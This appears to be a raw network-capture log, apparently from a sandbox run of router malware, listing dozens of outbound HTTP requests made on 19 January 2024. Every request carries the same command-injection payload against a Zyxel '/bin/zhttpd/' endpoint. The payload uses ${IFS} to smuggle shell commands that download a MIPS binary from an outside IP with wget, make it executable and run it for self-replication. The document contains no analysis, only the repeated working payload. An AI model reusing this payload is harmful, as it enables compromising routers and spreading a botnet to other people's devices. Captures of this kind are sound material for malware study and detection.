                                                  Jan 19, 2024 18:24:05.241367102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6701192.168.2.135934866.6.3.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241415977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6702192.168.2.1335596173.180.18.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241461039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6703192.168.2.1339786157.41.82.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241503954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6704192.168.2.1339470141.45.92.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241545916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6705192.168.2.1360764178.62.233.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241590977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6706192.168.2.1352736103.221.39.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241605043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6707192.168.2.133960648.54.201.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241672039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6708192.168.2.1358446124.238.89.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241710901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6709192.168.2.1359410182.197.88.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241731882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6710192.168.2.1336964216.65.65.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241770983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6711192.168.2.133391684.113.245.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241799116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6712192.168.2.1333930144.27.97.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241828918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6713192.168.2.1352962180.221.119.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241878033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6714192.168.2.133850846.73.213.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241915941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6715192.168.2.1337620128.38.244.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241945028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6716192.168.2.133480837.112.111.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.241966009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6717192.168.2.1335386211.31.242.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242026091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6718192.168.2.134563870.244.149.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242053986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6719192.168.2.1334334129.208.221.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242111921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6720192.168.2.1344732205.122.58.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242119074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6721192.168.2.134918613.0.129.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242176056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6722192.168.2.1358788219.121.60.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242235899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6723192.168.2.1353972105.242.85.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242264032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6724192.168.2.1352544120.29.217.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242316008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6725192.168.2.1345736162.68.192.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242340088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6726192.168.2.1338162172.211.184.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242372036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6727192.168.2.1359496151.62.136.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242409945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6728192.168.2.134463632.246.233.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242450953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6729192.168.2.1347656142.125.59.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242476940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6730192.168.2.134227259.225.58.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242525101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6731192.168.2.134630879.56.153.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242557049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6732192.168.2.1334136166.0.117.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242600918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6733192.168.2.135203460.212.198.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242621899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6734192.168.2.1359392170.129.118.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242670059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6735192.168.2.134589247.181.79.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242723942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6736192.168.2.134233234.99.79.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242752075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6737192.168.2.1342826187.86.139.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242805958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6738192.168.2.1336870125.64.153.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242860079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6739192.168.2.1333526221.9.240.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242896080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6740192.168.2.1350734195.36.102.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242933989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6741192.168.2.133316665.205.90.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242964983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6742192.168.2.1343772166.147.64.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.242991924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6743192.168.2.134872680.160.179.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243035078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6744192.168.2.1335204110.13.70.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243083954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6745192.168.2.1353252146.129.117.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243108034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6746192.168.2.133620890.194.184.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243140936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6747192.168.2.135642823.41.47.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243185997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6748192.168.2.133729059.138.74.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243213892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6749192.168.2.134911617.170.44.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243228912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6750192.168.2.134280281.24.239.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243290901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6751192.168.2.133343672.4.71.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243346930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6752192.168.2.135507063.232.20.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243377924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6753192.168.2.134063458.226.185.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243407965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6754192.168.2.133800638.115.49.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243464947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6755192.168.2.135952844.159.113.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243510962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6756192.168.2.1333658143.85.119.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243540049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6757192.168.2.134633231.18.63.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243582964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6758192.168.2.135353634.45.196.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243617058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6759192.168.2.1352224150.155.57.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243630886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6760192.168.2.135173083.31.154.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243676901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6761192.168.2.1341622217.241.62.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243712902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6762192.168.2.1355016139.153.145.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243765116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6763192.168.2.133376617.252.245.230443
                                                  TimestampBytes transferredDirectionData
